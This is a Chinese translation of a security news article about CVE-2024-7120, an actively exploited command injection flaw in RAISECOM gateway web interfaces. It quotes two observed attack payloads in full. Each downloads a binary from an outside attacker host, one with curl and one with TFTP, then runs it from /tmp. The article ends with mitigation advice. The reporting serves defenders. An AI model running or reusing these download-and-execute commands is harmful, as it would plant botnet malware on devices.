RAISECOM 网关中的严重漏洞被积极利用,数千人面临远程攻击

阅读量67570

发布时间 : 2024-09-27 14:29:31

x
译文声明

本文是翻译文章,文章原作者 Do son ,文章来源:securityonline

原文地址:https://securityonline.info/critical-flaw-in-raisecom-gateways-actively-exploited-exposing-thousands-to-remote-attacks/

译文仅供参考,具体内容表达以及含义原文为准。

在 RAISECOM 网关设备中新发现并积极利用的漏洞对企业安全构成重大威胁。该漏洞被跟踪为 CVE-2024-7120,关键 CVSS 评分为 9.8,允许远程攻击者在受影响的设备上执行任意命令,可能导致未经授权的访问、数据泄露和系统受损。

命令注入漏洞存在于 Web 界面的 list_base_config.php 脚本中,影响运行软件版本 3.90 的 RAISECOM Gateway 型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。安全研究人员已经证实了它很容易被利用,并且概念验证代码随时可用。

威胁行为者正在积极利用这一漏洞,自 9 月初以来就观察到了攻击,在 9 月 12 日至 13 日左右达到顶峰。

图片来源: Johannes B. Ullrich

安全专家、研究院长 Johannes B. Ullrich 博士确定了攻击中使用的两种不同的有效载荷。这些旨在下载和执行恶意软件的有效负载显示了常规僵尸网络扫描和破坏易受攻击的路由器的证据。

第一个有效载荷

 cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

第二个负载(使用 TFTP 而不是 HTTP):

 cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

虽然 RAISECOM 尚未发布补丁,但立即采取行动对于降低风险至关重要:

  • 限制访问:将对设备 Web 界面的访问限制为仅受信任的网络和授权人员。
  • 输入验证:在 Web 界面上实施严格的输入验证和清理程序,以防止恶意代码注入。
  • 网络监控:采用强大的网络监控和入侵检测系统来识别和响应任何可疑活动。
本文翻译自securityonline 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
安全客
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66